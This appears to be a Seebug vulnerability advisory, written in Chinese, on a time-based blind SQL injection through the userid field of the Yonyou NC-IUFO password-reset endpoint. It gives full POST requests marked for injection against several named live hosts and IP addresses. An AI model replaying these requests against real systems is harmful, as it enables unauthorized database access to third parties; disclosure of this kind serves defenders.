用友NC-IUFO系统通用SQL注入(三)

2015-01-13T00:00:00
ID SSV:93318
Type seebug
Reporter Root
Modified 2015-01-13T00:00:00

Description

简要描述:

...

详细说明:

该系统“忘记密码”模块存在sql注入漏洞 链接地址为:/epp/core/forgetpwd.jsp?pageId=forgetpwd&rand=1234

<img src="https://images.seebug.org/upload/201501/10164647850329b74ce2a803fc0de1dd767da668.png" alt="QQ图片20150110164630.png" width="600" onerror="javascript:errimg(this);">

说明:输入用户名和邮箱后提交,程序会提交给 /epp/core(可从抓取的数据包中看到), 漏洞参数:userid 数据库系统:oracle 注入类型:AND/OR time-based blind 这里直接给出证明案例(列出数据库实例名称即可、不深入): 0x01; http://nc.xhlbdc.com/epp/

POST /epp/core HTTP/1.1 Host: nc.xhlbdc.com Proxy-Connection: keep-alive Content-Length: 107 Origin: http://nc.xhlbdc.com Method: POST /epp/core HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36 Content-Type: application/x-www-form-urlencoded;charset=UTF-8 Accept: */* Referer: http://nc.xhlbdc.com/epp/core/forgetpwd.jsp?pageId=forgetpwd&rand=8438 Accept-Encoding: gzip,deflate,sdch Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2 Cookie: JSESSIONID=0000zdbG9i3ttIPJ7g2Ayl4KoRm:175j517sp userid=*&email=&type=forgetPWD&pageId=forgetpwd&pageUniqueId=177ef747-d34f-4076-b627-bf97720fbbdf&isAjax=1

<img src="https://images.seebug.org/upload/201501/10165621d9c4cb2ce4c8e58c932a8d0a2b7607fb.jpg" alt="QQ图片20150110165610.jpg" width="600" onerror="javascript:errimg(this);">

0x02: http://nc.pinggugroup.com:81/epp/

POST /epp/core HTTP/1.1 Host: nc.pinggugroup.com:81 Proxy-Connection: keep-alive Content-Length: 111 Origin: http://nc.pinggugroup.com:81 Method: POST /epp/core HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36 Content-Type: application/x-www-form-urlencoded;charset=UTF-8 Accept: */* Referer: http://nc.pinggugroup.com:81/epp/core/forgetpwd.jsp?pageId=forgetpwd&rand=7158 Accept-Encoding: gzip,deflate,sdch Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2 Cookie: JSESSIONID=0000ZPRlAAMZqeOX2_DUd6dPukK:-1 userid=*&email=aaaaa&type=forgetPWD&pageId=forgetpwd&pageUniqueId=ef251f23-ae34-4047-95f0-2f95f3085cf2&isAjax=1

<img src="https://images.seebug.org/upload/201501/101651300cd5259af6212d618c309048dacc85ad.jpg" alt="QQ图片20150110165121.jpg" width="600" onerror="javascript:errimg(this);">

0x03: http://123.232.105.202/epp/

POST /epp/core HTTP/1.1 Host: 123.232.105.202 Proxy-Connection: keep-alive Content-Length: 111 Origin: http://123.232.105.202 Method: POST /epp/core HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36 Content-Type: application/x-www-form-urlencoded;charset=UTF-8 Accept: */* Referer: http://123.232.105.202/epp/core/forgetpwd.jsp?pageId=forgetpwd&rand=4522 Accept-Encoding: gzip,deflate,sdch Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2 Cookie: JSESSIONID=0000FoJ4EiDJNB9px4Q_Y3g01j9:-1 userid=*&email=aaaaa&type=forgetPWD&pageId=forgetpwd&pageUniqueId=a4004558-4d36-4b1e-a397-6b8217320613&isAjax=1

<img src="https://images.seebug.org/upload/201501/101719046d6d5130e7343471cb3ca73c2534f71f.jpg" alt="QQ图片20150110171850.jpg" width="600" onerror="javascript:errimg(this);">

0x04: http://zfkg.com:8081/epp/

POST /epp/core HTTP/1.1 Host: zfkg.com:8081 Proxy-Connection: keep-alive Content-Length: 110 Origin: http://zfkg.com:8081 Method: POST /epp/core HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36 Content-Type: application/x-www-form-urlencoded;charset=UTF-8 Accept: */* Referer: http://zfkg.com:8081/epp/core/forgetpwd.jsp?pageId=forgetpwd&rand=1234 Accept-Encoding: gzip,deflate,sdch Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2 Cookie: JSESSIONID=843FB4AB3D3B82DDDC089308B9A97A23.server; JSESSIONID=9F6DE9B77CB36498D032BE46B92A6C54.server userid=*&email=aaaa&type=forgetPWD&pageUniqueId=78c7cfa2-6909-4ee5-b72b-3098364a5369&pageId=forgetpwd&isAjax=1

<img src="https://images.seebug.org/upload/201501/10171737aa5093ace895dbdc1c9f44687ef8eb2f.jpg" alt="QQ图片20150110171723.jpg" width="600" onerror="javascript:errimg(this);">

http://202.136.213.21/epp/core/forgetpwd.jsp?pageId=forgetpwd&rand=1234 http://61.175.97.50//epp/core/forgetpwd.jsp?pageId=forgetpwd&rand=1234

漏洞证明: